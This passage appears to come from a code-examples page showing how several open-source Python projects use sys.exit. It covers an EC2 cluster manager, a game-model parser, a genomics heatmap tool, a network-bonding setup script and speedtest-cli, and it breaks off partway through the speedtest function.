                if inst.state not in ["shutting-down", "terminated"]:
                    inst.stop()
            print("Stopping slaves...")
            for inst in slave_nodes:
                if inst.state not in ["shutting-down", "terminated"]:
                    if inst.spot_instance_request_id:
                        inst.terminate()
                    else:
                        inst.stop()

    elif action == "start":
        (master_nodes, slave_nodes) = get_existing_cluster(conn, opts, cluster_name)
        print("Starting slaves...")
        for inst in slave_nodes:
            if inst.state not in ["shutting-down", "terminated"]:
                inst.start()
        print("Starting master...")
        for inst in master_nodes:
            if inst.state not in ["shutting-down", "terminated"]:
                inst.start()
        wait_for_cluster_state(
            conn=conn,
            opts=opts,
            cluster_instances=(master_nodes + slave_nodes),
            cluster_state='ssh-ready'
        )

        # Determine types of running instances
        existing_master_type = master_nodes[0].instance_type
        existing_slave_type = slave_nodes[0].instance_type
        # Setting opts.master_instance_type to the empty string indicates we
        # have the same instance type for the master and the slaves
        if existing_master_type == existing_slave_type:
            existing_master_type = ""
        opts.master_instance_type = existing_master_type
        opts.instance_type = existing_slave_type

        setup_cluster(conn, master_nodes, slave_nodes, opts, False)

        # Write the public and private ip addresses to a file.
        write_public_and_private_ip_addresses_to_file(master_nodes, slave_nodes)

    else:
        print("Invalid action: %s" % action, file=stderr)
        sys.exit(1)
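
real_main treats configuration problems as fatal: a missing or world-readable identity file, incompatible instance types, and failed EC2 connections all print to stderr and call sys.exit(1). A small sketch mirroring the identity-file check from the example (only that check is shown; the function name is illustrative):

import os
import sys
from stat import S_IRUSR

def check_identity_file(path):
    if not os.path.exists(path):
        print("ERROR: The identity file '{f}' doesn't exist.".format(f=path),
              file=sys.stderr)
        sys.exit(1)
    mode = os.stat(path).st_mode
    # Owner must be able to read it, and the group/other permission bits must be zero.
    if not (mode & S_IRUSR) or oct(mode)[-2:] != '00':
        print("ERROR: The identity file must be accessible only by you.",
              file=sys.stderr)
        sys.exit(1)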

Example 8

Project: GameTools
Source File: unmdr.py
View license
def dump_model(base_name, num_models, f, model_number, outdir, dump = True, verbose=False):
    print("# Start model", "0x%x" % f.tell(), "##############################################################")
    name_length, = struct.unpack("<H", f.read(2))
    print("# submodel name length:", name_length)
    submodel_name = f.read(name_length).decode("ascii")
    print("# submodel name:", submodel_name)

    # output files
    obj_fout = None
    mtl_fout = None
    
    # object
    mdr_obj = None

    # logging to ease reversing
    logger = open("logger.txt", 'ab')
    
    if dump:
        obj_fout = open(os.path.join(outdir, "%s_%s.obj" % (base_name, submodel_name)), 'wb')
        mtl_fout = open(os.path.join(outdir, "%s_%s.mtl" % (base_name, submodel_name)), 'wb')
        mdr_obj = MDR_Object("%s_%s" % (base_name, submodel_name))

    unk, = struct.unpack("b", f.read(1))
    print("# Read unknown byte (always 2?):", unk)
    if unk != 2:
        error_message = "Unknown is not 2"
        #raise ValueError(error_message)
        print(error_message)
    print("# Start unknown section", "0x%x" % f.tell())    
    for i in range(0, int(0xB0/4)):
        unk, = struct.unpack("f", f.read(4))
        if verbose:
            print("# [%i] %f" % (i, unk))
    print("# Finished unknown section", "0x%x" % f.tell())


    ###############################################
    print("# Start face vertex indices")
    face_count, = struct.unpack("<I", f.read(4))
    print("# Face count:", face_count/3)
    manifest = {u'model': base_name, u'sub_model': submodel_name, u'vertex_index_offset' : f.tell()}
    
    for i in range(0, int(face_count/3)):
        if not dump:
            f.read(6)
        else:
            v0, v1, v2 = struct.unpack("<HHH", f.read(6))
            #print("f %i/%i %i/%i %i/%i" % (v0+1,v0+1,v1+1,v1+1,v2+1,v2+1))
            mdr_obj.index_array.append((v0,v1,v2))
    print("# Finished face vertex indices", "0x%x" % f.tell())
    ###############################################

    ###############################################
    print("# Start UVs")
    uv_in_section, = struct.unpack("<I", f.read(4))
    print("# UV in section:", uv_in_section/2)

    manifest[u'vertex_uv_offset'] = f.tell()
    
    for i in range(0, int(uv_in_section/2)):
        if not dump:
            f.read(8)
        else:
            u,v = struct.unpack("<ff", f.read(8))        
            #print("vt", u,v)
            mdr_obj.uv_array.append((u,v))                    
    print("# Finish UV section:", "0x%x" % f.tell())
    ###############################################

    print("# Start unknown section 1")
    unk, = struct.unpack("<I", f.read(4))
    print("# Unknown", "0x%x" % unk)

    if model_number == 0:
        print("# Some matrix?")
        for i in range(0, int(0x30/4)):
            unk1,unk2 = struct.unpack("ff", f.read(8))
            if verbose:
                print("# [%i] %f, %f" % (i, unk1, unk2))
        
        print("# End unknown section", "0x%x" % f.tell())
        unk, = struct.unpack("<I", f.read(4))
        print("# Read 4 bytes (always 0?)", unk)
        if unk != 0:
            error_message = "Unknown is not 0"
            #raise ValueError(error_message)
            print(error_message)

        object_count, = struct.unpack("<I", f.read(4))
        print("# Read 4 bytes, object type?: ", object_count)

        for i in range(0, object_count):
            name_length, = struct.unpack("<H", f.read(2))
            print(i, f.read(name_length))
            read_matrix(f)
        manifest[u'material'] = []
        length, = struct.unpack("<H", f.read(2))
        meta0_offset = f.tell()
        print("# random garbage? ", "0x%x" % f.tell())
        unk = f.read(48)
        length, = struct.unpack("<H", f.read(2))
        meta1_offset = f.tell()
        meta1 = read_material(f)
        if dump:
            mdr_obj.material = meta1
        manifest[u'material'].append( ( {u'offset': meta1_offset}, meta1) )
        print("# Unknown float", struct.unpack("f", f.read(4)))
        print("# end object type 0", "0x%x" % f.tell())
        # f.read(0x68)
        print("# End unknown", "0x%x" % f.tell())
    else:
        length, = struct.unpack("<xxH", f.read(4))
        unknown_meta = f.read(length).decode("ascii")
        print("# unknown meta2:", unknown_meta)
        valid_weapon_meta_list = ["weapon", "tripod", "base", "clip", "mortar", "missile", "grenade", "day sight",
                                  "m1a2", "m203", "m320", "day", "cylinder01", "ammo", "bogus-weapon", "periscope_circle",
                                  "mgbracket", "crows_structure", "launcher support"]
        valid_building_meta_list = ["junkdebris", "level", "roof", "wall"]
        valid_vehicle_meta_list = ["backbasket", "canvas", "gear", "hull", "hatch", "loadershield", "mount", "muzzle",
                                   "turret", "suporte", "rc_mg_sensors", "wheel"]
        valid_meta_list = valid_weapon_meta_list + valid_building_meta_list + valid_vehicle_meta_list
        
        # if True in map(lambda x: unknown_meta.startswith(x), valid_meta_list):
        print("# Reading", unknown_meta)
        f.read(0x60)
        normal_count, = struct.unpack("<I", f.read(4))
        print("# Count", normal_count)
        if normal_count == 0:
            f.read(0x68)
        else:
            for i in range(0, normal_count):
                length, = struct.unpack("<H", f.read(2))
                unknown_meta2 = f.read(length).decode("ascii")
                print("Sub-meta:", unknown_meta2)
                valid_sub_meta = ["commander", "eject", "exhaust", "gunner", "leader", "loader", "link", "muzzle",
                                  "firespot", "smoke", "weapon"]
                print(map(lambda x: unknown_meta2.startswith(x), valid_sub_meta))
                if True in map(lambda x: unknown_meta2.startswith(x), valid_sub_meta):
                    read_matrix(f)
                    print("#End of sub-meta", "0x%x" % f.tell())
                elif length == 0:
                    print("#End of sub-meta", "0x%x" % f.tell())
                else:
                    read_matrix(f)
                    print("#Possible error0 in %s! (%s) Report about it on the forum." % (f.name, unknown_meta2))
                    print("#End of sub-meta", "0x%x" % f.tell())
                    sys.exit(0)
            #special_meta_list = ["weapon", "base", "tripod", "launcher support", "mount", "hull", "turret", "suporte"]
            #if True in map(lambda x: unknown_meta.startswith(x), special_meta_list):
            f.read(0x68)
            # else:
            # print("# Possible error1 in %s! (%s) Report about it on the forum." % (f.name, unknown_meta))
            # sys.exit(0)
        # else:
        #     print("#Possible error2 in %s! (%s) Report about it on the forum." % (f.name, unknown_meta))
        #     sys.exit(0)
        print("# Unknown meta finished", "0x%x" % f.tell())

    unk, = struct.unpack("<I", f.read(4))
    print("# Read 4 bytes (always 0?)", unk)
    if unk != 0:
        error_message = "Unknown is not 0"
        #raise ValueError(error_message)
        print(error_message)

    name_length, = struct.unpack("<H", f.read(2))
    texture_name = f.read(name_length).decode("ascii")
    print("# Texture name:", texture_name)
    if dump:
        mdr_obj.texture_name = texture_name

    unk, = struct.unpack("b", f.read(1))
    print("# Read unknown byte (always 2?):", unk)
    if unk != 2:
        error_message = "Unknown is not 2"
        #raise ValueError(error_message)
        print(error_message)

    print("# Start unknown section of 176 bytes", "0x%x" % f.tell())
    for i in range(0, int(0xB0/4)):
        unk, = struct.unpack("f", f.read(4))
        if verbose:
            print("# [%i] %i" % (i, unk))
    print("# Finished unknown section", "0x%x" % f.tell())

    ###############################################
    print("# Start vertices")
    vertex_floats, = struct.unpack("<I", f.read(4))
    print("# Vertex count:", vertex_floats/3)
    manifest[u'vertex_offset'] = f.tell()
    
    for i in range(0, int(vertex_floats/3)):
        if not dump:
            f.read(12)
        else:
            x, y, z = struct.unpack("fff", f.read(12))
            mdr_obj.vertex_array.append((x, y, z))
    print("# End vertices", "0x%x" % f.tell())
    ###############################################
    
    print("# Start vertex normals")
    normal_count, = struct.unpack("<I", f.read(4))
    print("# Normals count:", normal_count/3) # 3 per vertex
    manifest[u'vertex_normals_offset'] = f.tell()

    for i in range(0, int(normal_count/3)):
        if not dump:
            f.read(6)
        else:
            nx, ny, nz = struct.unpack("<HHH", f.read(6))
            if verbose:
                print("# [%i] %i %i %i" % (i, nx, ny, nz))
            mdr_obj.vertex_normal_array.append((nx, ny, nz))
    print("# End normals", "0x%x" % f.tell())
    ###############################################

    unk, = struct.unpack("<I", f.read(4))
    print("# Parsing footer, count:", unk)
    if unk != 0:
        print(f.name)
        for i in range(0, unk):
            print(struct.unpack("<fff", f.read(12)))
            length, = struct.unpack("<I", f.read(4))
            f.read(length * 4)
    print("# End model ##############################################################")
    f.read(1)

    if dump:
        obj_fout.write(mdr_obj.make_wavefront_obj().encode("ascii"))
        mtl_fout.write(mdr_obj.make_wavefront_mtl().encode("ascii"))
        obj_fout.close()
        mtl_fout.close()
    logger.close()
    return manifest
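
In this parser, sys.exit(0) serves as a bail-out: when a sub-section name does not match any known prefix, the file and section names are printed so the user can report them, and parsing stops without raising. A tiny sketch of that pattern (the prefix list and message are illustrative, not the format's real vocabulary):

import sys

def parse_section(name, known_prefixes=("weapon", "hull", "turret")):
    if not name.startswith(known_prefixes):
        print("Possible error in section %r. Report about it on the forum." % name)
        sys.exit(0)  # stop quietly instead of raising on unknown layouts
    print("parsing section", name)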

Example 9

Project: fluff
Source File: heatmap.py
View license
def heatmap(args):
    datafiles = args.datafiles
    for x in args.datafiles:
        if not os.path.isfile(x):
            print "ERROR: Data file '{0}' does not exist".format(x)
            sys.exit(1)
    for x in args.datafiles:
        if '.bam' in x and not os.path.isfile("{0}.bai".format(x)):
            print "Data file '{0}' does not have an index file. Creating an index file for {0}.".format(x)
            pysam.index(x)

    # Options Parser
    featurefile = args.featurefile
    datafiles = [x.strip() for x in args.datafiles]
    tracks = [os.path.basename(x) for x in datafiles]
    titles = [os.path.splitext(x)[0] for x in tracks]
    colors = parse_colors(args.colors)
    bgcolors = parse_colors(args.bgcolors)
    outfile = args.outfile
    extend_up = args.extend
    extend_down = args.extend
    fragmentsize = args.fragmentsize
    cluster_type = args.clustering[0].lower()
    merge_mirrored = args.merge_mirrored
    bins = (extend_up + extend_down) / args.binsize
    rmdup = args.rmdup
    rpkm = args.rpkm
    rmrepeats = args.rmrepeats
    ncpus = args.cpus
    distancefunction = args.distancefunction[0].lower()
    dynam = args.graphdynamics
    fontsize = args.textfontsize

    # Check for mutually exclusive parameters
    if dynam:
        if merge_mirrored:
            print "ERROR: -m and -g option CANNOT be used together"
            sys.exit(1)
        if distancefunction == 'e':
            print 'Dynamics can only be identified using Pearson correlation as metric.'
            print 'Assigning metric to Pearson correlation'
            distancefunction = 'p'

    # Warning about too many files
    if (len(tracks) > 4):
        print "Warning: Running fluff with too many files might make you system use enormous amount of memory!"
    
    # Method of clustering
    if (args.pick != None):
        pick = [i - 1 for i in split_ranges(args.pick)]
        if not all(i <= len(tracks) - 1 for i in pick):
            sys.stderr.write("You picked a non-existent file for clustering.\n")
            sys.exit(1)
    else:
        pick = range(len(datafiles))


    if not cluster_type in ["k", "h", "n"]:
        sys.stderr.write("Unknown clustering type!\n")
        sys.exit(1)
    # Number of clusters
    if cluster_type == "k" and not args.numclusters >= 2:
        sys.stderr.write("Please provide number of clusters!\n")
        sys.exit(1)
    # Distance function
    if not distancefunction in ["e", "p"]:
        sys.stderr.write("Unknown distance function!\n")
        sys.exit(1)
    else:
        if distancefunction == "e":
            METRIC = cfg.DEFAULT_METRIC
            print "Euclidean distance method"
        else:
            METRIC = "c"
            print "Pearson distance method"
    ## Get scale for each track
    tscale = [1.0 for track in datafiles]

    # Function to load heatmap data
    def load_data(featurefile, amount_bins, extend_dyn_up, extend_dyn_down, rmdup, rpkm, rmrepeats, fragmentsize, dynam,
                  guard=None):
        if guard is None:
            guard = []
        # Calculate the profile data
        data = {}
        regions = []
        print "Loading data"
        try:
            # Load data in parallel
            pool = multiprocessing.Pool(processes=ncpus)
            jobs = []
            for datafile in datafiles:
                jobs.append(pool.apply_async(load_heatmap_data, args=(
                featurefile, datafile, amount_bins, extend_dyn_up, extend_dyn_down, rmdup, rpkm, rmrepeats,
                fragmentsize, dynam, guard)))
            for job in jobs:
                track, regions, profile, guard = job.get()
                data[track] = profile
        except Exception as e:
            sys.stderr.write("Error loading data in parallel, trying serial\n")
            sys.stderr.write("Error: {}\n".format(e))
            for datafile in datafiles:
                track, regions, profile, guard = load_heatmap_data(featurefile, datafile, amount_bins, extend_dyn_up,
                                                                   extend_dyn_down, rmdup, rpkm, rmrepeats,
                                                                   fragmentsize, dynam, guard)
                data[track] = profile
        return data, regions, guard

    # -g : Option to try and get dynamics
    # Extend features 1kb up/down stream
    # Cluster them in one bin
    guard = []
    amount_bins = bins
    extend_dyn_up = extend_up
    extend_dyn_down = extend_down
    if dynam:
        # load the data once to get the features which extend below 0
        guard = check_data(featurefile, extend_dyn_up, extend_dyn_down)
        extend_dyn_up = 1000
        extend_dyn_down = 1000
        amount_bins = 1

    # Load data for clustering
    data, regions, guard = load_data(featurefile, amount_bins, extend_dyn_up, extend_dyn_down, rmdup, rpkm,
                                         rmrepeats,
                                         fragmentsize, dynam, guard)
    
    # Normalize
    norm_data = normalize_data(data, cfg.DEFAULT_PERCENTILE)

    clus = hstack([norm_data[t] for i, t in enumerate(tracks) if (not pick or i in pick)])

    # Clustering
    if cluster_type == "k":
        print "K-means clustering"
        ## K-means clustering
        # PyCluster
        labels, _, nfound = Pycluster.kcluster(clus, args.numclusters, dist=METRIC)
        if not dynam and merge_mirrored:
            (i, j) = mirror_clusters(data, labels)
            while j:
                for track in data.keys():
                    data[track][labels == j] = [row[::-1] for row in data[track][labels == j]]
                for k in range(len(regions)):
                    if labels[k] == j:
                        (chrom, start, end, gene, strand) = regions[k]
                        if strand == "+":
                            strand = "-"
                        else:
                            strand = "+"
                        regions[k] = (chrom, start, end, gene, strand)
                n = len(set(labels))
                labels[labels == j] = i
                for k in range(j + 1, n):
                    labels[labels == k] = k - 1
                (i, j) = mirror_clusters(data, labels)

        ind = labels.argsort()

        # Hierarchical clustering
    elif cluster_type == "h":
        print "Hierarchical clustering"
        tree = Pycluster.treecluster(clus, method="m", dist=METRIC)
        labels = tree.cut(args.numclusters)
        ind = sort_tree(tree, arange(len(regions)))
    else:
        ind = arange(len(regions))
        labels = zeros(len(regions))

    # Load data for visualization if -g option was used
    if dynam:
        data, regions, guard = load_data(featurefile, bins, extend_up, extend_down, rmdup, rpkm, rmrepeats,
                                         fragmentsize, dynam, guard)

    f = open("{0}_clusters.bed".format(outfile), "w")
    for (chrom, start, end, gene, strand), cluster in zip(array(regions, dtype="object")[ind], array(labels)[ind]):
        if not gene:
            f.write("{0}\t{1}\t{2}\t.\t{3}\t{4}\n".format(chrom, start, end, cluster + 1, strand))
        else:
            f.write("{0}\t{1}\t{2}\t{3}\t{4}\t{5}\n".format(chrom, start, end, gene, cluster + 1, strand))
    f.close()
    # Save read counts
    readcounts = {}
    for i, track in enumerate(tracks):
        readcounts[track] = {}
        readcounts[track]['bins'] = []
        for idx, row in enumerate(data[track]):
            bins = ''
            for b in row:
                if not bins:
                    bins = '{0}'.format(b)
                else:
                    bins = '{0};{1}'.format(bins, b)
            readcounts[track]['bins'].append(bins)
    
    input_fileBins = open('{0}_readCounts.txt'.format(outfile), 'w')
    input_fileBins.write('Regions\t')
    for i, track in enumerate(titles):
        input_fileBins.write('{0}\t'.format(track))
    input_fileBins.write('\n')
    for i, track in enumerate(tracks):
        for idx in ind:
            input_fileBins.write('{0}:{1}-{2}\t'.format(regions[idx][0], regions[idx][1], regions[idx][2]))
            for i, track in enumerate(tracks):
                input_fileBins.write('{0}\t'.format(readcounts[track]['bins'][idx]))
            input_fileBins.write('\n')
        break
    input_fileBins.close()
 
    if not cluster_type == "k":
        labels = None

    scale = get_absolute_scale(args.scale, [data[track] for track in tracks])
    heatmap_plot(data, ind[::-1], outfile, tracks, titles, colors, bgcolors, scale, tscale, labels, fontsize)
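
heatmap() front-loads its validation: missing data files, unknown clustering types, and a missing cluster count each print or write a message and call sys.exit(1) before any heavy computation starts. A compact sketch of that validation gate (the parameter names are assumptions, not fluff's API):

import os
import sys

def validate(datafiles, cluster_type, numclusters):
    for path in datafiles:
        if not os.path.isfile(path):
            print("ERROR: Data file '{0}' does not exist".format(path))
            sys.exit(1)
    if cluster_type not in ("k", "h", "n"):
        sys.stderr.write("Unknown clustering type!\n")
        sys.exit(1)
    if cluster_type == "k" and numclusters < 2:
        sys.stderr.write("Please provide number of clusters!\n")
        sys.exit(1)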

Example 10

Project: bonding
Source File: bonding.py
View license
def collect_bond_info(groups, distro):
    ifaces = get_iface_list()
    bonds = {}
    all_slaves = {}
    for iface in ifaces:
        if is_iface_master(iface) and get_slave_iface_list(iface):
            slaves = get_slave_iface_list(iface)
            if slaves:
                bonds[iface] = slaves
                for slave in list(slaves):
                    all_slaves[slave] = iface
            else:
                bonds[iface] = []

    bond_range = range(0, 101)
    if bonds:
        print ('%s\nThe following bonded interfaces are already '
               'configured:\n' % YELLOW)
        for bondIface in bonds:
            print '%s' % bondIface
            bond_int = int(bondIface.replace('bond', ''))
            del bond_range[bond_range.index(bond_int)]
            for slave in bonds[bondIface]:
                print '\t%s' % slave
    else:
        print ('\n%sThere are no bonded interfaces currently present in the '
               'running\nconfiguration on this server. This does not take '
               'into account configuration\nthat have not yet been loaded '
               'into the running configuration.''' % GREEN)

    print '%s' % RESET

    children = None
    if groups:
        selections = {}
        print 'Interface groups available for configuration:\n'
        i = 1
        for key in reversed(groups.keys()):
            group = [key] + groups[key]
            print '%s%s) %s%s' % (PINK, i, ' '.join(sorted(group)), RESET)
            selections[str(i)] = group
            i += 1

        try:
            response = raw_input('\nWhich numerical interface group from '
                                 'above would you like to configure? '
                                 '(leave blank or hit enter to perform '
                                 'manual entry later) ').strip()
            if not response:
                children = None
            elif response not in selections:
                print '%sInvalid selection. Can not continue.%s' % (RED, RESET)
                sys.exit(1)
            else:
                children = selections[response]
        except KeyboardInterrupt:
            sys.exit(0)

    bond = defaults('What is the name of the bond interface you are '
                    'configuring?', 'bond%s' % bond_range[0])
    if bond in ifaces and is_iface_master(bond) and get_slave_iface_list(bond):
        del bond_range[bond_range.index(int(bond.replace('bond', '')))]
        bond = defaults('%s%s is already configured as a master interface.%s\n'
                        'What is the name of the bond interface you are '
                        'configuring?' % (RED, bond, RESET),
                        'bond%s' % bond_range[0])
        if (bond in ifaces and is_iface_master(bond) and
                get_slave_iface_list(bond)):
            print ('%sA valid bond interface was not provided. Can not '
                   'continue%s' % (RED, RESET))
            sys.exit(1)

    print ('%sThe bonded interface will be named: %s%s%s\n' %
           (GREEN, YELLOW, bond, RESET))

    mode_map = {
        '0': 'balance-rr',
        '1': 'active-backup',
        '2': 'balance-xor',
        '3': 'broadcast',
        '4': '802.3ad',
        '5': 'balance-tlb',
        '6': 'balance-alb',
    }

    modes = list(mode_map.keys()) + list(mode_map.values())

    mode = defaults('Which bonding mode do you want to use for %s?' % bond,
                    'active-backup')
    if mode not in modes:
        mode = defaults('%sThe bonding mode may be one of %s.%s\nWhat '
                        'bonding mode do you want to use for %s?' %
                        (RED, ', '.join(modes), RESET, bond), 'active-backup')
        if mode not in modes:
            print ('%sA valid bonding mode was not provided. Can not '
                   'continue%s' % (RED, RESET))
            sys.exit(1)

    extra_opts = ''
    if mode == '4' or mode == '802.3ad':
        if distro == 'redhat':
            extra_opts = ' lacp_rate=1'
        elif distro == 'debian':
            extra_opts = '    bond-lacp-rate 1'

    if mode in mode_map:
        mode = mode_map[mode]

    print ('%sThe bonded interface will use mode %s%s%s\n' %
           (GREEN, YELLOW, mode, RESET))

    if not children:
        children = defaults('What are the interfaces that will be part of the '
                            'bond?', 'eth0 eth1')
        if children:
            children = children.split()
        else:
            print ('%sYou did not provide any interfaces to be part of %s%s' %
                   (RED, bond, RESET))
            sys.exit(1)

    bail = False
    ip_addresses = {}
    for child in children:
        if child not in ifaces:
            print ('%sYou provided an interface name that does not exist on '
                   'this system: %s%s' % (RED, child, RESET))
            bail = True
        elif is_iface_slave(child):
            print ('%sYou provided an interface name that is already part of '
                   'an already configured bond (%s): %s%s' %
                   (RED, all_slaves[child], child, RESET))
            bail = True

        ip_address = get_ip_address(child)
        if ip_address:
            ip_addresses[ip_address] = child

    if bail:
        sys.exit(1)

    print '%sThe interfaces that will be used for %s%s%s will be: %s%s%s\n' % (
        GREEN, YELLOW, bond, GREEN, YELLOW, ' '.join(children), RESET)

    if len(ip_addresses) > 1:
        print '%sThe following IP addresses were found:' % YELLOW
        for addr in ip_addresses:
            print '%s: %s' % (ip_addresses[addr], addr)
        ip_address = defaults('\n%sWhich of the above IP addresses do you '
                              'want to use for the primary IP for %s?' %
                              (RESET, bond), ip_addresses.keys()[0])
    else:
        ip_address = ip_addresses.keys()
        if ip_address:
            ip_address = ip_address[0]
        else:
            ip_address = ''
        ip_address = defaults('What IP address do you want to use for the '
                              'primary IP for %s?' % bond, ip_address)

    try:
        socket.inet_aton(ip_address)
    except socket.error:
        print '%s"%s" is not a valid IP address.%s' % (RED, ip_address, RESET)
        sys.exit(1)

    print '%sThe IP address that will be used for %s%s%s will be: %s%s%s\n' % (
        GREEN, YELLOW, bond, GREEN, YELLOW, ip_address, RESET)

    netmask = None
    if ip_address in ip_addresses:
        netmask = get_network_mask(ip_addresses[ip_address])
    if not netmask:
        netmask = defaults('No Network Mask was located. What Network Mask do '
                           'you want to use for %s?' % bond, '255.255.255.0')
    else:
        netmask = defaults('What Network Mask do you want to use for %s?' %
                           bond, netmask)

    print ('%sThe Network Mask that will be used for %s%s%s will be: '
           '%s%s%s\n' % (GREEN, YELLOW, bond, GREEN, YELLOW, netmask, RESET))

    gateway_dev = get_default_gateway_dev()
    print ('%sCurrent default gateway details from the running '
           'configuration:' % YELLOW)
    print 'Gateway IP:  %s' % get_default_gateway()
    print 'Gateway Dev: %s' % gateway_dev
    print ('This does not take into account configurations that have not yet '
           'been loaded into the running configuration.')
    print '%s' % RESET

    change_gw_default_response = True
    if gateway_dev.startswith('bond'):
        change_gw_default_response = False
    change_gw = confirm('Change the default gateway and gateway device on '
                        'this system?', change_gw_default_response)
    if change_gw:
        gateway = get_default_gateway()
        if not gateway:
            gateway = defaults('No default gateway was located on this system.'
                               '\nWhat default gateway do you want to use for '
                               'this system? It must be accessible from %s.' %
                               bond,
                               '.'.join(ip_address.split('.')[0:3]) + '.1')
        else:
            gateway = defaults('%s accessible default gateway for this '
                               'system?' % bond, gateway)
        print ('%sThe default gateway that will be used for %s%s%s will be: '
               '%s%s%s\n' %
               (GREEN, YELLOW, bond, GREEN, YELLOW, gateway, RESET))
    else:
        gateway = False
        print ('%sThe default gateway will %sNOT%s be changed for %s%s%s\n' %
               (GREEN, YELLOW, GREEN, YELLOW, bond, RESET))

    return {
        'master': bond,
        'slaves': children,
        'ipaddr': ip_address,
        'netmask': netmask,
        'gateway': gateway,
        'mode': mode,
        'opts': extra_opts
    }
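
The prompts above repeatedly validate user input and call sys.exit(1) when it cannot be salvaged. A minimal sketch of that validate-or-exit step, reduced to the IP address check (the helper name is invented for illustration):

import socket
import sys

def require_valid_ipv4(ip_address):
    # Abort with a non-zero exit status if the address is not valid IPv4,
    # mirroring the socket.inet_aton check used above.
    try:
        socket.inet_aton(ip_address)
    except socket.error:
        print('"{0}" is not a valid IP address.'.format(ip_address))
        sys.exit(1)
    return ip_address

require_valid_ipv4("192.0.2.10")  # valid input returns; invalid input exits with status 1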

Example 11

Project: speedtest-cli
Source File: speedtest_cli.py
View license
def speedtest():
    """Run the full speedtest.net test"""

    global shutdown_event, source, scheme
    shutdown_event = threading.Event()

    signal.signal(signal.SIGINT, ctrl_c)

    description = (
        'Command line interface for testing internet bandwidth using '
        'speedtest.net.\n'
        '------------------------------------------------------------'
        '--------------\n'
        'https://github.com/sivel/speedtest-cli')

    parser = ArgParser(description=description)
    # Give optparse.OptionParser an `add_argument` method for
    # compatibility with argparse.ArgumentParser
    try:
        parser.add_argument = parser.add_option
    except AttributeError:
        pass
    parser.add_argument('--bytes', dest='units', action='store_const',
                        const=('byte', 1), default=('bit', 8),
                        help='Display values in bytes instead of bits. Does '
                             'not affect the image generated by --share')
    parser.add_argument('--share', action='store_true',
                        help='Generate and provide a URL to the speedtest.net '
                             'share results image')
    parser.add_argument('--simple', action='store_true',
                        help='Suppress verbose output, only show basic '
                             'information')
    parser.add_argument('--list', action='store_true',
                        help='Display a list of speedtest.net servers '
                             'sorted by distance')
    parser.add_argument('--server', help='Specify a server ID to test against')
    parser.add_argument('--mini', help='URL of the Speedtest Mini server')
    parser.add_argument('--source', help='Source IP address to bind to')
    parser.add_argument('--timeout', default=10, type=int,
                        help='HTTP timeout in seconds. Default 10')
    parser.add_argument('--secure', action='store_true',
                        help='Use HTTPS instead of HTTP when communicating '
                             'with speedtest.net operated servers')
    parser.add_argument('--version', action='store_true',
                        help='Show the version number and exit')

    options = parser.parse_args()
    if isinstance(options, tuple):
        args = options[0]
    else:
        args = options
    del options

    # Print the version and exit
    if args.version:
        version()

    socket.setdefaulttimeout(args.timeout)

    # Pre-cache the user agent string
    build_user_agent()

    # If specified bind to a specific IP address
    if args.source:
        source = args.source
        socket.socket = bound_socket

    if args.secure:
        scheme = 'https'

    if not args.simple:
        print_('Retrieving speedtest.net configuration...')
    try:
        config = getConfig()
    except URLError:
        print_('Cannot retrieve speedtest configuration')
        sys.exit(1)

    if not args.simple:
        print_('Retrieving speedtest.net server list...')
    if args.list or args.server:
        servers = closestServers(config['client'], True)
        if args.list:
            serverList = []
            for server in servers:
                line = ('%(id)4s) %(sponsor)s (%(name)s, %(country)s) '
                        '[%(d)0.2f km]' % server)
                serverList.append(line)
            print_('\n'.join(serverList).encode('utf-8', 'ignore'))
            sys.exit(0)
    else:
        servers = closestServers(config['client'])

    if not args.simple:
        print_('Testing from %(isp)s (%(ip)s)...' % config['client'])

    if args.server:
        try:
            best = getBestServer(filter(lambda x: x['id'] == args.server,
                                        servers))
        except IndexError:
            print_('Invalid server ID')
            sys.exit(1)
    elif args.mini:
        name, ext = os.path.splitext(args.mini)
        if ext:
            url = os.path.dirname(args.mini)
        else:
            url = args.mini
        urlparts = urlparse(url)
        try:
            request = build_request(args.mini)
            f = urlopen(request)
        except:
            print_('Invalid Speedtest Mini URL')
            sys.exit(1)
        else:
            text = f.read()
            f.close()
        extension = re.findall('upload_extension: "([^"]+)"', text.decode())
        if not extension:
            for ext in ['php', 'asp', 'aspx', 'jsp']:
                try:
                    request = build_request('%s/speedtest/upload.%s' %
                                            (args.mini, ext))
                    f = urlopen(request)
                except:
                    pass
                else:
                    data = f.read().strip()
                    if (f.code == 200 and
                            len(data.splitlines()) == 1 and
                            re.match('size=[0-9]', data)):
                        extension = [ext]
                        break
        if not urlparts or not extension:
            print_('Please provide the full URL of your Speedtest Mini server')
            sys.exit(1)
        servers = [{
            'sponsor': 'Speedtest Mini',
            'name': urlparts[1],
            'd': 0,
            'url': '%s/speedtest/upload.%s' % (url.rstrip('/'), extension[0]),
            'latency': 0,
            'id': 0
        }]
        try:
            best = getBestServer(servers)
        except:
            best = servers[0]
    else:
        if not args.simple:
            print_('Selecting best server based on latency...')
        best = getBestServer(servers)

    if not args.simple:
        print_(('Hosted by %(sponsor)s (%(name)s) [%(d)0.2f km]: '
               '%(latency)s ms' % best).encode('utf-8', 'ignore'))
    else:
        print_('Ping: %(latency)s ms' % best)

    sizes = [350, 500, 750, 1000, 1500, 2000, 2500, 3000, 3500, 4000]
    urls = []
    for size in sizes:
        for i in range(0, 4):
            urls.append('%s/random%sx%s.jpg' %
                        (os.path.dirname(best['url']), size, size))
    if not args.simple:
        print_('Testing download speed', end='')
    dlspeed = downloadSpeed(urls, args.simple)
    if not args.simple:
        print_()
    print_('Download: %0.2f M%s/s' %
           ((dlspeed / 1000 / 1000) * args.units[1], args.units[0]))

    sizesizes = [int(.25 * 1000 * 1000), int(.5 * 1000 * 1000)]
    sizes = []
    for size in sizesizes:
        for i in range(0, 25):
            sizes.append(size)
    if not args.simple:
        print_('Testing upload speed', end='')
    ulspeed = uploadSpeed(best['url'], sizes, args.simple)
    if not args.simple:
        print_()
    print_('Upload: %0.2f M%s/s' %
           ((ulspeed / 1000 / 1000) * args.units[1], args.units[0]))

    if args.share and args.mini:
        print_('Cannot generate a speedtest.net share results image while '
               'testing against a Speedtest Mini server')
    elif args.share:
        dlspeedk = int(round((dlspeed / 1000) * 8, 0))
        ping = int(round(best['latency'], 0))
        ulspeedk = int(round((ulspeed / 1000) * 8, 0))

        # Build the request to send results back to speedtest.net
        # We use a list instead of a dict because the API expects parameters
        # in a certain order
        apiData = [
            'download=%s' % dlspeedk,
            'ping=%s' % ping,
            'upload=%s' % ulspeedk,
            'promo=',
            'startmode=%s' % 'pingselect',
            'recommendedserverid=%s' % best['id'],
            'accuracy=%s' % 1,
            'serverid=%s' % best['id'],
